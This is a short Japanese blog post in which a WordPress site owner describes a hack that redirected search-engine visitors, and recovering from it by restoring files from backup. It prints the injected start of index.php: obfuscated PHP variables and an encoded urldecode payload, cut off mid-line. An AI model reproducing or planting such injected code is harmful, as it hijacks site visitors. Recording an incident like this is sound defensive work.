WordPress で作ったサイト。
検索サイトから表示させようとすると別のところに飛んでしまう。
色々調べて、ウィルスソフトも大丈夫だし。マルウェア? 検索しても何も引っかからない。
過去のバックアップからファイルを戻しながら見てみると、index.phpが書き換えられていた
元に戻して復旧、
ファイルの権限を見直しながら様子を見ている。
?php
//header(‘Content-Type:text/html; charset=utf-8’);
$O0O0O__O0_=’102′;
$O0_0OO_0_O=’1′;
$OO0O00___O=’1′;
$O__0O0O0O_=urldecode(“%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A$
/**
* Front to the WordPress application. This file doesn’t do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define(‘WP_USE_THEMES’, true);
/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . ‘/wp-blog-header.php’ );
上記の赤の部分が追記された部分である。
まぁ、ひとつ勉強になったな。